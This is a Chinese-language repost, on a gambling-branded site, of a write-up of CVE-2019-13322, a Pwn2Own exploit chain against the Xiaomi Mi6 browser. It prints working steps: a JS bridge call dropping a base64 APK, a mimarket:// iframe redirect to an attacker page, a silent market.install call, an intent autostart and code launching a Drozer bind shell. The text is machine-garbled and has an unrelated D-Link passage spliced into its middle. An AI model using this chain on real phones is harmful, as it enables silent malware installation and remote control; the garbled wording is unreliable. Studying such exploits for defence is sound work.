CVE-2019-13322 :Mi6浏览器RCE破绽 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

CVE-2019-13322 :Mi6浏览器RCE破绽

申博_新闻事件 申博 29次浏览 已收录 0个评论

简介

在Pwn2own 2018上, F-Secure Labs研究人员证明了当用小米Mi6阅读器连接到进击者掌握的web页面后,小米Mi6阅读器会被进击。

具体步骤以下:

· 用户挑选web页面、SMS音讯或邮件中上的一个链接,链接回在小米阅读器运用中加载进击者掌握的web页面

· Web页面运用JS bridge手艺自动下载HTML文件

· 运用可阅读视图来加载Market app

· Market app经由历程视图中供应的URL加载webView,加载进击者的另一个web页面

· Web页面运用另一个JS bridge函数来装置下载的apk文件

运用intent代办自动启动app

手艺细节

初始的web页面:下载文件和触发Market APP

第一步请求受害者接见进击者掌握的网站,而且必需发起指向进击者页面的链接。初始的web页面会实行2个行动。
起首,自动下载HTML文件。经由历程含有anchor元素的下载属性来自动下载再小米阅读器中是不允许的。但运用一切web页面中都包括的JS bridge是能够的。
该bridge中含有一个名为share的函数,保留了base64编码的数据到硬盘上。然后APK文件也会用该要领保留。

这个D-Link不愿修复的高危漏洞,影响面被严重低估了!

随着网络空间的规模和行动不断扩大,其与日常生活日益交织。往往在网络空间一起微小的安全事件可能带来一连串“蝴蝶效应”,譬如去年全球最大的半导体代工制造商台积电工厂意外“中毒”,造成工厂停工不说还连累了要发新品的苹果,三天亏了10亿。而这次煽动翅膀的是D-Link产品的一个漏洞。 这个D-Link 不愿修复的高危漏洞 2019年9月,集成自动化网络安全解决方案商Fortinet 的 FortiGuard Labs 发现并向官方反馈了 D-Link 产品中存在的一个未授权命令注入漏洞(FG-VD-19-117/CVE-2019-16920)。攻击者可以利用该漏洞在设备上实现远程代码执行(RCE),且无需通过身份认证。该漏洞被标记为高危级别漏洞。 在 Fortinet 的报告中,受此漏洞影响的设备型号有 DIR-655C、DIR-866L、DIR-652 和 DHP-1565。 遗憾的是,D-Link 表示这些产品已超出服

@JavascriptInterface public void share(String arg8, String arg9, String arg10, String arg11, String arg12) {OutputStream v1_1;FileOutputStream v1;OutputStream v2;File v6;byte[] v5;…int v0 = "base64,".length() + arg11.indexOf("base64,");try {v5 = Base64.decode(arg11.substring(v0), 0);String v0_2 = arg8 != null || arg9 != null ? "share_" + arg8 + arg9 + arg10.hashCode() + ".jpg" : "jsShare.jpg";v6 = new File(com.android.browser.j.a.a(this.a), v0_2);v2 = null;

该要领能够用下面的含有要装置的apk文件作为base64编码的字符串的JS代码接见:

miui.share("foo","foo","foo","base64," + apkFile);

在该例子中,apk数据会保留到文件/sdcard/Android/data/com.android.browser/cache/share/share_-1038556538.jpg中。

该文件胜利下载后,web页面上就会有一个重定向到Market app (com.xiaomi.market)的链接。这能够经由历程建立一个iframe的src属性设置为可阅读的URL来完成:

var iFrame = document.createElement("iframe");var marketRedirUrl = "http://testxiaomi.com/XiaomiPoC/market.html";iFrame.src = "mimarket://browse?url=" + encodeURIComponent(marketRedirUrl);document.body.appendChild(iFrame);

这会加载Market app的JoinActivity运动。它运用供应的url参数作为WebView的URL。经由历程设定url参数为进击者掌握的web站点,进击者就能够加载恣意HTML到WebView中。

经由历程Market app触发装置

Market app中的WebView含有一个名为market的JS bridge。个中包括了一个能够运用当地文件体系上的文件来悄然装置drozer APK的函数。下面的JS代码会触发前一步下载的文件的app装置:

function installAPK(){market.install('{"appInfo":{"id":"test", "packageName":"com.xiaomi.test", "appId":"com.xiaomi.test"}, "callBack":"test", "needArrange":true, "ref":"test", "refPosition":1234, "apkPath":"/sdcard/Android/data/com.android.browser/cache/share/share_-1038556538.jpg"}');}

这会挪用install要领并启动AppArrangeService效劳,install要领会剖析供应的JSON数据,AppArrangeService效劳会悄然地装置APK文件。

App自动启动

在该历程结束时,装置完成后,app会实行一个到JS代码的回调。这会尝试挪用install函数挪用中callBack参数中明显的JS函数。这会用来触发已装置的app的自动启动。
测试JS函数以下:

function test(){document.location='intent://dzprovider/1#Intent;scheme=content;end';}

阅读器APP处置惩罚的花样中的content schemes以下所示:

<activity android:name="com.android.browser.BrowserActivity"><intent-filter><action android:name="android.intent.action.VIEW" /><category android:name="android.intent.category.BROWSABLE" /><category android:name="android.intent.category.DEFAULT" /><data android:scheme="http" /><data android:scheme="https" /><data android:scheme="file" /><data android:scheme="content" /><data android:scheme="inline" /><data android:mimeType="text/html" />…</intent-filter>

Dzprovider就是Drozer app中的内容供应商:

<providerandroid:name=".views.MyContentProvider"android:authorities="dzprovider"android:enabled="true"android:exported="true"></provider>

尝试加载当前内容URL后,阅读器APP必需肯定mimetype是什么。这是经由历程挪用相关内容供应商的getType(Uri uri)要领来完成的。经由历程覆写Drozer app的该要领,那末就能够完成代码实行,然后用来启动Drozer bind shell:

@Overridepublic String getType(Uri uri) {Intent i = new Intent();i.addCategory("com.mwr.dz.START_EMBEDDED");i.setComponent(new ComponentName("com.mwr.dz","com.mwr.dz.services.ServerService"));Context c = getContext();c.startService(i);return “foo”;}

原文地点: https://www.4hou.com/info/news/21855.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明CVE-2019-13322 :Mi6浏览器RCE破绽
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址